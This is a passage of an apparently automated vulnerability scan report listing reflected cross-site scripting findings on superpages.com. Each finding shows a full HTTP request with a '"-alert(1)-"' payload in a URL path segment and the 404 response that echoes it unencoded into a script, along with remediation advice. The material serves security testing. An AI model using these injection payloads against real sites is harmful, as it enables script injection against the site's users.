The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common3fdca&quot;-alert(1)-&quot;96068b15aaf/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=0CB998F802310503F3DF642089016142; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common3fdca"-alert(1)-"96068b15aaf/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssef7bf&quot;-alert(1)-&quot;eed6ae6e6f1/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=BFEAD8CA936BB2E59BD56DAA6BF8F3D7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:07 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/print.cssa006a&quot;-alert(1)-&quot;cbff4859ae5
Server: Unspecified
Set-Cookie: JSESSIONID=7112A7C7D0BF2A8F8F9AF1A7F814C733; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/print.cssa006a"-alert(1)-"cbff4859ae5?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent. Here the whole request path is written into the actualUrl string in the script of the HTML 404 page, so the same sink is reachable from every path segment. The application should avoid echoing user data within this context; where the value must be exposed to script, encode it for a JavaScript string literal (every non-alphanumeric character as a \xHH or \uHHHH escape, which also neutralises a literal </script>) rather than only HTML-encoding it (the reason phrase of the 404 status line is encoded, the script is not). The 404 status is no mitigation: the browser renders the error page and executes its script.

Request

GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonda1ff&quot;-alert(1)-&quot;dc2efa902dc/css/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=4239D7C1884951A967FFE5B24D2C2BFE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:21 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css95a34&quot;-alert(1)-&quot;686e302e816/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=7716BE18718FF0A9D0724AA014CD1180; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css95a34"-alert(1)-"686e302e816/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/reset.css3aabb&quot;-alert(1)-&quot;23c3bf4d12
Server: Unspecified
Set-Cookie: JSESSIONID=1ECBA4F29730F93048865C6330D8702E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/reset.css3aabb"-alert(1)-"23c3bf4d12?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonad15d&quot;-alert(1)-&quot;4cb99c62a1b/css/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=98569611A90DDF545C63EF46782C91CF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc75f4&quot;-alert(1)-&quot;02b021d68ca/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=961E21ED8472E86EF4F8EBD9ECEB24D4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:24 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sendtom.cssec1e7&quot;-alert(1)-&quot;03bc909001e
Server: Unspecified
Set-Cookie: JSESSIONID=89100A70CAE7838057FA2B0BF2BD7136; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:30 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond0c20&quot;-alert(1)-&quot;e4243f6ac8f/css/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=AC90724B3D6058EB845DA1C9B8F4C038; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:43 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/csse8cb3&quot;-alert(1)-&quot;ad160d53bf0/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=A653C00D1D509E4F913800C0855B5E3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:53 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spcore.css4fc04&quot;-alert(1)-&quot;230ea56f1b4
Server: Unspecified
Set-Cookie: JSESSIONID=F118099836FFFF9E6242ECE63F34CE56; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:00 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common97191&quot;-alert(1)-&quot;a26cfc23980/css/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=EA759A48641FB029323258B469F2D696; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:59 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6e3da&quot;-alert(1)-&quot;acb1d78ef25/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=D52748B2F7AE3B38F917957D6A181889; Path=/
